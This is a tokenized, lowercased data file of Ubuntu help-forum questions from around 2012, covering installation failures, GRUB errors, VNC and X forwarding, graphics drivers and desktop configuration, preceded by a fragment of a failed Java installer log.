2012-05-23 19:40:41 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |223.224.12.144|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-i586.tar.gz' 0k ... .. 100 % % 52.9k=0.1s 2012-05-23 19:40:41 ( 52.9 kb/s ) - `./jdk-7u3-linux-i586.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up resolvconf ( 1.63ubuntu14 ) ... setting up libutouch-geis1 ( 2.2.9-0ubuntu3 ) ... setting up vino ( 3.4.2-0ubuntu1 ) ... processing triggers for resolvconf ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : oracle-java7-installer error in function :
141195	connecting to ssh/rdp/vnc through one machine ?	i am asked to come up with a solution for connection to ssh , vnc and rdp services in company firewall/proxy via one box on dmz . the task is to get users to connect to this one box and then to the service they would like to connect to . currently , i have one ubuntu machine on dmz used for ssh . users ssh to ubuntu-dmz and then to their target machine and the idea is to the same for vnc and rdp . the solution should be open source/ubuntu where possible ?
141196	how do i access my ubuntu computer using vncserver/viewer ?	i have an ubuntu computer that i want to remotely log into using a vnc connection . so far , this is what i have done : sudo apt-get install tightvncserver after downloading the software , i typed on the terminal : vncserver :78 i assume the :78 refers to some sort of port that i open for vnc connection ( i 'm new at this , so feel free to correct me ) . after entering in a password , this appears : new 'x ' desktop is finiteelementmethodfinitedifferencemethod:78 creating default startup script /home/pmdelgado2/.vnc/xstartup starting applications specified in /home/pmdelgado2/.vnc/xstartup log file is /home/pmdelgado2/.vnc/finiteelementmethodfinitedifferencemethod:78.log i proceeded to look up my ip address on the internet . then , from a windows computer on the same network , used ultravnc and entered in :78 and tried to connect . of course , this failed to produce the connection . i have two primary questions about doing this : how do i verify ( on ubuntu , not on the internet ) the correct ip address for my computer ? if my ubuntu computer is on a private wireless network at home , and i try to connect remotely from another location ( different network ) , is there anything special i need to do to connect through the network ( firewalls , network passwords , etc. ) ? especially in the special case of loging in from a windows computer to my ubuntu ?
141197	ca n't get a working system from 32bit alternate iso 12.04	okay , so having some problems with this . as a newbie , this is black magic to me . i used the alternate 32-bit installation ( via a live usb ) , and selected “install” as the option . as the steps progressed , i chose the option of guided installation with encrypted lvm , and “no” for the option to encrypt the home folder ( why bother if the whole drive is encrypted , right ? ) . later , i selected “ubuntu desktop” as the type of installation . it asks me to install grub ( its the only operating system on the machine ) to the master boot loader ( or some such ) and i have said “yes” – i tried that on one attempt , tried to specify /dev/sda on a second attempt ( i hope i have spelt that right ) , but no luck . all seemed to go just fine during the installation . however , on rebooting after the installation , the first problem is the screen . after the dell startup screen it switches into its boot processes ( i guess ) , but the screen goes dead – not black , it actually powers off . however , on one attempt i plugged in a second monitor , and hey presto , up it came on both monitor and laptop , and remained on the laptop when i unplugged the monitor . this is not a sustainable solution , but i can deal with it for now . that dead screen actually hides the prompt for entering the passphrase for the encryption . so i do that , and we move on . if i have n't used the second monitor trick , the screen stays dead , although it does briefly flick into blank and black for a moment . next challenge – its asking me for a login to the computer . i enter my user name and password , and we 're through ... to a command line prompt that welcomes me to ubuntu 12.04 lts ( gnu/linux 3.2.0-24-generic-pae i686 ) . that “686” surprises me , as i thought that first “6” indicates a 64-bit setup ? i was sure i followed the link to 32 bit , but ... . so , i start again with a fresh installation of the 32-bit alternate iso on the usb , and ... straight back to here , this prompt that does nothing . i ca n't figure out what to do from here . help . ( fyi , what i did looked very like this video http : //youtu.be/v4bje0slblo ) its a dell latitude d420 . an update ( next day ) well , thank you very much for the help . for the record , i had tried 'startx ' , and had no luck - it prompted me to install ... grub , i think , and it did n't work then , either . this time , i jumped straight to an installation of lubuntu . i followed the guides , but this time selected 'manual install ' after the core system was done . went all the way through , rebooted , got the same login ( after jumpstarting the screen with an external monitor again ) and then ran the command lines as suggested by izx . wonderful ! it now starts up just fine into lubuntu . a little slower than i was led to believe , perhaps slower than a previous version of linux mint 12 i ran on it , unencrypted , but maybe that is the penalty for encryption . i have to install libreoffice , firefox ( and zotero ) for work purposes , which are apparently 'heavier ' , so we 'll see . must now figure out how to get it to use wireless ( sigh ... ) but the installation is in . thanks both of you for your help , and special nod to izx ! b
141199	wireless is connected but keeps showing `` problem loading page ''	my wireless does not keep disconnecting to the point where i have to manually enable it . i just manually enable it as soon as i log in . just clarifying as i read some other issues like this . i 'm using firefox , and every other google search i run shows me the connection was reset while loading the page page never had this problem before , and not sure where to start . i 'm on a macbook , running ubuntu 11.10 and gnome shell any thoughts ?
141202	server 12.04 boots to grub cli	yesterday , i rebooted the server and it booted up to grub . screen says 'minimal bash-like ... . etc ' . i 've tried booting to the server rescue mode from the install disk and tried reinstalling grub . i 've tried the boot rescue disk , still does n't boot . i can get in and see all my files via the server rescue mode , but grub will not boot anything . no menu comes up , just the grub cli . i only have my boot drive plugged in . i 've disconnected the other drives for now . i do n't know what 's going on or how to fix it ! http : //paste.ubuntu.com/1002267/ 12.04 , no hardware/software raid
141204	what is the correct way to install maven and eclipse ?	i have installed maven and eclipse using the software center in ubuntu 12.04 . there is no sign of maven integration in eclipse . ( `` new maven project '' and such ) what is the correct way to install ? ( to get maven eclipse integration )
141211	how can i increase the mouse cursor size and change its color in unity ?	how can i increase the mouse cursor size ? i use my computer plugged to a tv far from me . i need to increase the mouse cursor to make it visible . also i 'd like to change it to a darker color as i used to do easily in gnome 2 . i 'm using ubuntu 12.04 with unity and did n't find this config .
141217	how can i run an application in gnome-terminal automatically when booting ?	i need to run an application automatically when ubuntu starts . i 've got this app running without opening the terminal . however , this application displays some information in a terminal window and , therefore , i need that the app runs strictly after opening gnome-terminal ( automatically ) . to this end i 've tried to create a script file in init.d as it is explained here . the content of the script is : # ! /bin/bash cd /home/mediambient/programa /usr/bin/gnome-terminal -e ./driver & this works if i execute the file , but does not seem to do anything when i reboot the computer . can anyone tell me what i 'm doing wrong ? thanks in advance .
141218	what are the pros and cons of cpu frequency control on a laptop ?	what are the pros and cons of controlling ( lowering , or even overclocking ) the cpu frequency on a laptop ? how can i do it in ubuntu and will it increase my battery life ( as i never play games and stuff ) and do fan speed and cpu frequency have any correlation ?
141221	no precision specified for ( float ) , webgl	i was looking into webgl , and , to see if my system supported it , i went to this test page to see what happened . unfortunately , i get an error that says `` error : 0:2 : '' : no precision specified for ( float ) '' . is this a limitation of my hardware , or do i need to install a different driver , or something ? i 'm running ubuntu 12.04 , on an asus a52f . my graphics card is a intel ironlake mobile x86/mmx/sse2 , or at least that 's what it says when i run `` details '' . under details/graphics , the field called `` driver '' displays the same thing .
141222	timezone appears to be set correctly , but time is 7 hours off	i 'm installing ubuntu 12.04 . on the time/date settings , i tried to click on seattle ( where i am ) , but it only registered vancouver . i modified the ntp config files to use the north american pool , if that matters . on the time/date dialog , i have `` automatically from the internet '' checked . the time value it shows is 7 hours before the current time . another minor issue is that the date it shows is apparently using the non-us format ( yy-mm-dd ) . i 'm ok with that last issue if that 's the default , but the time being 7 hours off is definitely a problem . what am i missing ?
141225	lazy load startup applications	i am using ubuntu 12.04 . i have a few startup applications - dropbox , transmission , a few custom scripts . these stretch the login time to ~10 -15 seconds ( an old machine here ) . i do not need to start these immediately at login . is there a way to lazy load these applications ?
141229	how to add a shell script to launcher as shortcut	i want to add some shell scripts in my launcher as shortcuts.. they are located deep inside and i have to navigate to it every time to execute them ... i tried this link where the 2nd answers seems to solvee it but as said in comments neither can i find any option to add a launcher.. i guess it existed in 11.04 with a `` + '' button on launcher but i use 12.04 . so how do i get this working ? ? and i need those commands everytime for sure.. !
141234	how do i disable file indexing ?	how can i disable file indexing in ubuntu 12.04 lts ?
141235	how do i nstall ms office 2010 via wine ?	i am trying to install ms office 2010 on ubuntu 12.04 on my new macbook pro ( 15 '' ) . i already read and followed every existing threads on forums and followed every existing tutorial , but my problem seem unique so far , since whichever solution i try , the problem remains . when i launch playonlinux , two boxes appear one after the other ( before the latest upgrade of ubuntu of last week , the second box did not appear , only the first one did ) ; the first one tells me : error : playonlinux is unable to find 32-bits opengl libraries . you might encounter problem with your games . '' when i close this window , a second one pops up , stating : error : playonlinux can not find 7z . you should install it to use playonlinux . of course , i tried purging playonlinux ( uninstalling it and re-installing it ) . i also tried other versions of playonlinux . nothing matters : the problem remains . i did not succeed so far to install 32-bits opengl libraries , since i have a radeon graphics card ( which seems to be unusual ) and i just can not find these libraries . once the two `` error '' boxes are closed , playonlinux is open , but does not seem to work properly ; when i try to install microsoft office 2010 , nothing happens . when i try to close playonlinux , it is even worse : unity seems unable to close it ( i even had a frozen screen when trying to xkill it through the terminal ) . i am looking forward to any tips that could help . p.s . : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ amd radeon hd 6600m series ]
141238	make an internet connection default	how do i make an internet connection default ? i have 3 connections .one of them is auto-etho which is default . i would like to change this . please dont ask me to delete auto-etho cause i need it on some specific situations .
141240	`` ca n't open display '' even after access with xhost	i 'm trying to run a graphical program remotely , without using ssh . i 've set the display variable on the server ( let 's say server.com , linux , not ubuntu , and no su rights ) to point to my workstation ( workstation.com , ubuntu 10.04 ) setenv display workstation.com:0 then on my workstation i 've tried both xhost +server.com and xhost + then i ssh into the server ( to test things ) : ssh username @ server.com and try to run xclock , and get the following error : error : ca n't open display : workstation.com:0 i 've looked at /etc/ssh/ssh_config on the workstation and i should be forwarding correctly : x11forwarding yes . how do i go about troubleshooting this ? what logs on the workstation document these failed attempts ? to explain why i 'm doing this : i want to run a batch job on a server to debug an mpi-based parallel program . i want to run xterm as the batch job executable , per the instructions provided by the system admins . this setup use to work . i reinstalled things on my workstation and since then i frequently get one-time message along the lines the authenticity of host 'hostname ( xxx.xxx.xxx.xx ) ' ca n't be established . my attempt to fix the above was to move my ~/.ssh/known_hosts file to a back up on both server and host , and then to ssh from each to the other with the flag -o stricthostkeychecking=no . i no longer get that message , but i was wondering does this play a part in why x11 forwarding is not working ?
141241	paper clip in libreoffice writer	is there a paper clip in libreoffice like there is in ms office ? if not , how do i get it ?
141243	how to make file permissions for ttys0 stick after reboot ?	every time i restart the computer i have to sudo chmod a+rw /dev/ttys0 to run any program that uses serial communication .
141252	is there a package for an executable version of v8 ?	i 'm trying to get vim js lint plugin working under ubuntu 12.04 . the plugin requires the d8 command , which is an executable version of google 's v8 javascript engine . i do see a libv8 package , but that does n't seem to either install d8 or at least , not put it on my path . the package is described as libv8-3.7.12.22 - v8 javascript engine - runtime library is there any package that will install an executable version of the v8 engine , or do i just have to build it manually ?
141254	how can i tell if i have 32-bit version of ubuntu if i 'm installing using the windows installer ?	i choose to install ubuntu from windows installer . my question is i do n't know whether it is a 64-bit version 32bit version . could any body tell me what version it is ? what i want is 32-bit version cause i have a 32-bit cpu
141257	how do i recover from a `` error : unknown file system grub '' boot error ?	i have dual boot system with windows 7 and 10.04 . recently i have installed 12.04 over 10.04 . now when i start my computer it shows following message : error : unknown file system grub rescue i do n't know what to do .
141259	compiz huge cpu usage while play audacious	i have distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise and i ca n't use audacious 3.2.1 ( ubuntu package ) , because compiz start use 25-50 % my cpu usage . intel ( r ) core ( tm ) i3 cpu m 350 @ 2.27ghz kernel 3.2.0-24-generic x86_64 vga compatible controller : nvidia corporation gt218 [ geforce 310m ] compiz 0.9.7.8 i reinstalled audacious , but that not helps me . what to do ?
141265	pdf reader with highlighting support and save the file	i am missing the feature of highlighting the pdf file directly from reader and saving the changes in the file . this is a feature of adobe acrobat reader ( the commercial one ) . i have tried okular , but it does not save the changes in the file . so please do n't comment this question as an exact duplicate of this question `` how can i highlight pdf '' . i want a name of a pdf reader which is equivalent to adobe acrobat reader ( in the functionality of hightlighting pdf and saving the highlighted file also in pdf ) . i have tried , xournal and okular . xournal does not do the right thing , very slow . and okular can highlight , but has no option of saving the the file as pdf .
141266	how to add entries in quicklists	the quicklists is an amazing feature of unity . but sometimes some options which i might want are not available in the quicklist . for the simplest example : in the nautilus quicklist , suppose i need a directory that i had added in the home folder . now how do i bring it as an entry in the quicklists ? how could i delete some options from it ? how could i add separators ?
141269	disk information pane in disk utility is black in lxde	when i open disk utility , and click on one of the drives , the information ( right ) pane is black . any ideas ? thanks
141273	is it possible to set the number of entries hud returns ?	i would like the hud to return at least ten entries . can i do that somehow ? ( use case : in texmaker , i can have ten different user tags - i do not remember their names , so i would like to display all ( after typing user tag ) , but hud now shows only five )
141276	geforce video card problems with ubuntu 11.10	i 'm having issues with my video card drivers : geforce 9600 gt/pci/sse2 when installing nouveau - not getting 3d support and the 2d is really buggy , fuzzy fonts and lots of other stuff . really ugly . when installing nvidia drivers , getting 3d support , but not 2 monitors . when using nvidia settings , and setting up 2 monitors , x crashes on weird occasions , like opening skype , or virtualbox ... i 'm guessing the popup windows killing it ... really weird stuff ... have no idea what else can i do to make this work right . edit : ok , so i 've narrowed down the issue . when using just nvidia drivers , and empty xorg.conf everything work ok , except dual screens - i get only one screen , and i 'm using nvidia settings to get it working as dual screens , but when i save the configuration to xorg.conf , after restarting x , i 'm back to chrashing on skype etc . the xorg.conf saved by nvidia settings : user @ ubuntu : ~ $ cat /etc/x11/xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ yellow ) fri aug 5 12:31:28 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' fontpath `` unix/:7100 '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9600 gt '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt-0 : nvidia-auto-select +1280+0 , crt-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
141277	how can i change gnome shell theme ?	i 've installed the gnome shell in ubuntu 12.04 and i want to change the `` shell theme '' , but it does n't allow me to do that . the alert says something like : '' the gnome-shell extension is not activated '' , and i want to install it with the console , but it returns me an error . how can i solve this problem ?
141282	access locked files from windows xp	because of a problem in an xp computer i had to use ubuntu live cd to access and save data to an external usb drive . now , some of the folders in the usb can be accessed without any problem but some of them not . any file in this folder starts with `` locked- '' and ends with a strange extension . the output of ls command is : -rw -- -- -- - 1 paco paco 19968 may 19 19:02 locked-xiquets.doc.riwd -rw -- -- -- - 1 paco paco 19968 may 19 19:02 locked-reunio-2.doc.xybe -rw -- -- -- - 1 paco paco 27136 may 19 19:02 locked-resumen del movimiento de la cuenta de la c0munidad de propietarios de buenavisa.doc.zxuq -rw -- -- -- - 1 paco paco 19968 may 19 19:02 locked-prueba 1.doc -rw -- -- -- - 1 paco paco 25600 may 19 19:02 locked-naranjas.doc.gbwx -rw -- -- -- - 1 paco paco 25600 may 19 19:02 locked-movimiento de las cuentas de la comunidad.doc.prfo -rw -- -- -- - 1 paco paco 321536 may 19 19:02 locked-instruccions-radio.doc.wfgm -rw -- -- -- - 1 paco paco 24064 may 19 19:02 locked-finca casa.doc.yhaf -rw -- -- -- - 1 paco paco 30720 may 19 19:02 locked-contrato asador.doc.rkyl -rw -- -- -- - 1 paco paco 26624 may 19 19:02 locked-contrato asador 2010.doc.nsbx -rw -- -- -- - 1 paco paco 30208 may 19 19:02 locked-contabilidad escalera.xls.brhd -rw -- -- -- - 1 paco paco 73216 may 19 19:02 locked-com ara tu de qui eres.doc.acwr -rw -- -- -- - 1 paco paco 19968 may 19 19:02 locked-aviso a todos los vecinos.doc.zuli -rw -- -- -- - 1 paco paco 19968 may 19 19:02 locked-apendre a archivar.doc.begs -rw -- -- -- - 1 paco paco 25088 may 19 19:02 locked-acta comunidad.doc i have tried to just remove the .xxxx extension but then libreoffice ca n't properly open files . it asks for encoding but iso-8859 and utf8 give error in opening the file . any idea ? thanks in advance . edit output of mount : /dev/sdb1 on /media/48c1da7909338e77 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) renaming jpg files does not work : paco @ xubasco : /media/48c1da7909338e77/papa/fotografia/cuadros $ mv locked-cuadros_120.jpg.fpyq cuadros_120.jpg paco @ xubasco : /media/48c1da7909338e77/papa/fotografia/cuadros $ display cuadros_120.jpg display : not a jpeg file : starts with 0x60 0x32 `cuadros_120.jpg ' @ error/jpeg.c/emitmessage/236 . output of lsattr : paco @ xubasco : /media/48c1da7909338e77/papa/fotografia/cuadros $ lsattr locked-cuadros_090.jpg.gfml lsattr : not implemented function while reading flags on locked-cuadros_090.jpg.gfml i had to translate from spanish , sorry .
141290	how to delete gnome 3.4 themes in ubuntu 12.04	i want to see if i can delete all themes and fix the notification i have . i have deleted the ppa 's , but the themes are still in gnome tweak . where are themes located so i can remove them ? thanks .
141293	tibia error on ubuntu 11.10 64bit	i have a bit of a problem , i 'm trying to play tibia on my 11.10 installation and i get the following error : ./tibia : error while loading shared libraries : libglu.so.1 : can not open shared object file : no such file or directory all i used to do to play was download , extract and run the game . i 'm running a 64bit installation of 11.10 . any ideas ? here 's the output to ldd on the file : amatteo @ adrian-ubuntu : ~/tibia $ ldd ./tibia linux-gate.so.1 = > ( 0xf76e1000 ) libgl.so.1 = > /usr/lib32/nvidia-current/libgl.so.1 ( 0xf75f8000 ) libglu.so.1 = > not found libx11.so.6 = > /usr/lib/i386-linux-gnu/libx11.so.6 ( 0xf74c1000 ) librt.so.1 = > /lib32/librt.so.1 ( 0xf74b8000 ) libstdc++.so.6 = > /usr/lib/i386-linux-gnu/libstdc++.so.6 ( 0xf73cd000 ) libm.so.6 = > /lib32/libm.so.6 ( 0xf73a3000 ) libgcc_s.so.1 = > /lib/i386-linux-gnu/libgcc_s.so.1 ( 0xf7385000 ) libc.so.6 = > /lib32/libc.so.6 ( 0xf720a000 ) libpthread.so.0 = > /lib32/libpthread.so.0 ( 0xf71ef000 ) libnvidia-tls.so.280.13 = > /usr/lib32/nvidia-current/tls/libnvidia-tls.so.280.13 ( 0xf71ec000 ) libnvidia-glcore.so.280.13 = > /usr/lib32/nvidia-current/libnvidia-glcore.so.280.13 ( 0xf58db000 ) libxext.so.6 = > /usr/lib/i386-linux-gnu/libxext.so.6 ( 0xf58c8000 ) libdl.so.2 = > /lib32/libdl.so.2 ( 0xf58c2000 ) libxcb.so.1 = > /usr/lib/i386-linux-gnu/libxcb.so.1 ( 0xf58a3000 ) /lib/ld-linux.so.2 ( 0xf76e2000 ) libxau.so.6 = > /usr/lib/i386-linux-gnu/libxau.so.6 ( 0xf589f000 ) libxdmcp.so.6 = > /usr/lib/i386-linux-gnu/libxdmcp.so.6 ( 0xf5898000 ) i made a search for libglu.so.1 and it was found in /usr/lib and in /usr/lib32
141294	ubuntu 12.04dual windows wo n't start	i recently installed a dual boot with my windows 7 to try it out . after checking it out i shut it down so i could use windows for school . now my pc wo n't turn on at all . ca n't even get into bios . after hitting power its black and flicks off after like 7 seconds . i need to use windows ! ! ! i installed both on c drive and did n't set a default . not even ubuntu starts so now my laptops useless . im on my phone now . please help .
141298	multiple monitors	the machine was originally connected with two monitors and worked perfectly fine . one of my colleagues used one monitor for his laptop without disconnecting either of these two monitors from the ubuntu machine . after he disconnected the laptop , the ubuntu machine could not recognize one of the monitors . how can i go back to using two monitors ?
141306	not getting gui mode on ubuntu 12.04 desktop edition after installation on vmware workstation 7	i installed ubuntu 12.04 desktop edition on my pc using vmware workstation 7 . i assigned 1gb ram and 20 gb hard disk to ubuntu . while starting ubuntu virtual machine , it is not starting up with gui mode . in is prompting me my login id in textual mode always . after waiting for long time as well the gui mode is not appearing . i tried running sudo apt-get install updates sudo apt-get install xinit sudo apt-get install ubuntu-desktop honestly , i do n't know the meaning of all these.i am very new to ubuntu.please help me here what to do ? below is my laptop configuration os : genuine windows 7 home basic ( 64 bit ) ram : 3 gb processor : intel core i3 regards salil
141311	`` unknown keyword in configuration file boot : '' error when booting off a live usb	i successfully followed instructions in https : //wiki.ubuntu.com/liveusbpendrivepersistent to make a bootable usb drive for ubuntu12.04 using the command 'gksudo usb-creator-gtk ' in a terminal window - there were no error messages and the final pop message said i can now use the usb drive to successfully boot a system into the latest ubuntu 12.04 however , on a brand new samsung laptop ( np-300e5z-a0pin - a i5 core machine ) , i get the following message : syslinux 3.63 debian-2008-07-15 ebios copyright ( c ) 1994-2008 h peter anvin unknown keyword in configuration file boot : it hangs there ... am i missing out any steps ... how do i proceed with the installation ... many thanks in advance
141317	after upgrade from 11.10 to 12.04 video display hurts my eyes	i am running on an asus x54h laptop ( intel video adapter ) . when i installed ubuntu 11.10 the video display was crisp and sharp , right out of the box . there was no need to do anything else beyond the installation . last week i did a format/install of 12.04 . after that installation the display was somehow off . it literally hurt my eyes to look at it to long . i goggled for a couple of hours trying different fixes with no success . i formatted and re-installed 11.10 and the display was as sharp as it was . screen resolution and refresh rate was the same in both installations ( checked with xrandr ) and it is clearly not a hw issue . i do not have a dual monitor and its not an issue of brightness and/or contrast . i tried changing them both with no noticeable results . a link to the laptop 's spec so what could it be ? thanks
141318	gnupg / pgp front end for ubuntu ?	is there a nice gnupg/pgp front-end for ubuntu ? there used to be a package called something like seahorse-plugin , that let you right-click on files to encrypt them . i do n't see it anymore in the software repository though . is there something else ?
141324	how do i create ubuntu virtual machines using kvm ?	i would like to create several ubuntu server virtual machines using kvm to test and use . how do i create virtual machines using kvm ?
141328	default themes are gone , windows look ugly	i have recently made an upgrade from 11.10 to 12.04 . everything went fine , except the theme i used to have , hope-dt , was having the fonts coloured white . so , yesterday , trying to find an updated version of hope theme , i have installed this .deb ( which was suppose to fix the problems ) : i386 build of hope-gtk-theme 0.0.2-precise in ubuntu precise release now , i have found myself with a broken desktop ... it 's like gtk3 . firstly i ca n't find the default theme ambience anymore . no tool shows it ( system settings/appearence nor myunity nor advanced settings ) . and i have all over crappy windows and buttons . check out the screenshots : so now after nice unity3d smooth feeling , i am stuck with this kind of windows . is there a way to reinstall the default themes again ? or to somehow fix gtk3 . to make things worse , i thought it would be a good idea to restore my system to a back-up i made with duplicity yesterday . it was a good opportunity to use the tool , because i am backing up for some time now , and i never got my hands to make a restore . the restore crashed in the middle ( ubuntu 12.04 encountered an error ) . and since then ... i keep getting errors , and the system tries to send infos to ubuntu but does n't seem to be able to : i am pretty disappointed that i did not manage to make a successful back-up/restore ... why do we even have the tool then ... at any rate , this issue may be related to the fact that i might have some gtk files missing . i am pretty close to make a full reinstall , but it pains me to know that all of this might have started because i wanted to fix my theme : ( any way to restore the default theme ? or gtk ? maybe that solves some problems .
141332	ubuntu one fresh install fails to authenticate	fresh install in win7 x64 - authentication fails , but verified password is correct . any hints ?
141333	how well does webmin 1.580 work with 12.04 ?	we 're using ubuntu desktop 8.04 lts as a server for our intranet and are currently planning an upgrade to 12.04 lts . however , since we 're using webmin , we 're wondering whether webmin 1.580 is a good fit for version 12.04 , as there 's a `` development version '' 1.587 out there to support 12.04 . will 1.580 work with ubuntu 12.04 ? is the development version only there to add support to some new functionality from 12.04 or is it the minimal version working on 12.04 ? anyone had it installed on production , yet ?
141335	merge partitions ( that are n't next to each other ) ?	all , so i 've already read through quite a few threads , but did n't quite find an identical situation . i have 4 partitions , and i want two . i 'm running ubuntu 10.04.1 lts . i have gparted installed ( kde wm ) and tried to re-size the partitions , but it just moves them around , rather than merge them . ( they 're not next to each other ) is this something i 'll be forced to use fdisk for ? have a photo , but ca n't post because i'mma n00b , i guess . disk /dev/sda : 107.4 gb , 107374182400 bytes 255 heads , 63 sectors/track , 13054 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00006727 device boot start end blocks id system /dev/sda1 * 1 62 497983+ 83 linux /dev/sda2 63 2432 19030016 8e linux lvm partition 2 does not end on cylinder boundary . /dev/sda3 2433 13054 85321215 83 linux filesystem size used avail use % mounted on /dev/mapper/turnkey-root 17g 2.0g 14g 13 % / none 1004m 188k 1004m 1 % /dev none 1007m 0 1007m 0 % /dev/shm none 1007m 84k 1007m 1 % /var/run none 1007m 0 1007m 0 % /var/lock none 1007m 0 1007m 0 % /lib/init/rw thanks , joel
141341	touchscreen with dual monitors	i have ubuntu 12.04 and two monitors , where first is touchscreen . system recognizes resolution as one big screen with 3840 * 1080 resolution . problem is when using touch calibration , calibrator screen gets sized over both screens . so , when touching screen , pointer gets double moves on x axis . is there any solution ? graphic : nvidia with twin wiew
141343	hard drive overheats when laptop running on ac power	here is the deal . when using 12.04 laptop runs so cool and quiet but immediately i plug in , the temperature of the hard drive starts to go up . ( hitting 60•c in no time ) . however when i unplug the ac cable , the temperature drops to normal levels ( 45-50•c ) . what could be done to correct this ? thanks in advance hp pavilion dv6700 intel core duo 2.0ghz 4gb ram 250 gb hdd here are pastebins of hdparm and smartctl on my ubuntu partition sda3 : sudo smartctl -a /dev/sda3 ( on battery ) sudo smartctl -a /dev/sda3 ( on ac ) sudo hdparm -i /dev/sda3 ( on battery ) sudo hdparm -i /dev/sda3 ( on ac ) sudo hdparm -i /dev/sda3 ( on battery ) sudo hdparm -i /dev/sda3 ( on ac )
141344	how to play piano via a midi keyboard ?	i am sorry to bother you but i do n't know very much . this is about playing the piano through the computer . i have an m-audio keystation 88 which is a whole separate machine that connects through the usb cable that i got to work in windows xp with software from cantabile , i do not remember how but it does not matter because linux does not have cantabile . there are a lot of things like midi and synthesizers and cards and jacks and controls and i do not know how they go together . a while ago i tried to get wine to work but could n't do it . all the documentation i can find assumes you know almost all of the answer already . i do n't presume to ask anyone how to do it but i do need something very simple to at least get me started .
141345	create shared shortcuts for guest login	i have decided to use ubuntu as my base os for my internet cafe machines , and also for the thin clients that connect to my windows terminal server running 2008 r2 . 8 machines in internet cafe room , and 8 in the teaching room . all run latest 12.04 lts . fairly proficient with linux admin , looking after the machines etc , but i have a question that i think needs some thought before i try to roll this out over all 16 machines i am going to be using the guest login feature as it leaves no persistent data behind , and given the nature of losing power at least twice a week , it 's nice to know it wo n't keep my customer 's login details when we do lose electricity . so , what i need is to configure the guest account to include some basic shortcuts , a pre-configured rdp shortcut for rammia , that has the ip and colour depth and screen size details preconfigured , and for that to be available on every desktop as a persistent shortcut . is this possible ? second , i would like the machines to auto log on to the guest account .
141355	downloading ubuntu	why ca n't i download ubuntu ? i try to do everything it says to do and it does n't work ! people have given me a decent laptop , but the copy of windows that is on it is so screwed up that i ca n't use it . i need an operating system of some kind and ca n't afford windows , i ca n't even afford the 5.00 gbp to get the disk from ubuntu .
141357	how to move wifi passwords from ubuntu to xubuntu ?	how can i move wifi passwords from ubuntu to xubuntu ? xubuntu doesnt have .gconf/system/networking/connections .
141358	find previously edited system files	i am upgrading a fairly old server and i wish to find all of the system config files that i may have previously edited e.g . samba ( smb.conf ) , nfs ( exports ) , networking etc . bash history ca n't help with this particular server . i know i 've edited some , but ca n't remember which ...
141360	can i run chrome stable and canary in parallel ?	is it possible to keep the two in parallel ? i know you can on windows and osx on ubuntu i get a conflict when trying to install either one if the other is installed .
141364	altgr not functional on german keyboard ( operating in english )	i wanted a particular netbook that was not available in the uk so i ordered it from germany , and naturally it came with a german keyboard ( fine by me ) . i set ubuntu 's keyboard layout to german , although the operating language is english . this worked fine in 10.10 and 11.04 . but since ubuntu 11.10 , i have had a persistent problem . altgr does not work . nor do short cuts such as ctrl+c . sometimes though , altgr does kick in for a short while and then inexplicably stops . sometimes a , y and q do not work , and then do . sometimes fn works and then does not . i 'm not the most sophisticated ubuntu user but i am experienced enough to know ( a ) how to use keyboard settings and ( b ) that it is not just me . i see this issue has been raised before ( for example , “altgr” + “q” is not “ @ ” ) but so far i can find no answer . this is my only problem with ubuntu , which i adore , but it is seriously hampering my user experience . i would appreciate any help !
141365	wireless network ( s ) not available when booting ubuntu 12.04 desktop 64 bit from usb flash drive	i 'm trying to connect to my wireless network at home after `` trying '' ubuntu 12.04 desktop 64-bit from a usb flash drive ( without installing ) . is this even possible ? i can connect to the internet through my ethernet port just fine but wireless is not working . i have checked my bios settings and my wireless switches are enabled . i have a dell latitude d830 . any help would be appreciated since my hard drive just crashed and i ordered a new one but for now the only way to connect to the internet is through ubuntu , booted from a usb device .
141367	tab completion causes dollar signs to be escaped	using ubuntu 12.04 . when i 'm typing a path in terminal that starts with an env variable reference , i hit tab to complete a word and it escapes the $ in the env variable reference . as a result , i have to keep on going back to the beginning of the line and removing the backslash so i can continue navigating down a tree . e.g . before tab : user @ test : ~ $ $ home/docum after tab : user @ test : ~ $ \ $ home/documents/ my $ home/.bashrc has the `` bash_completion '' stuff enabled .
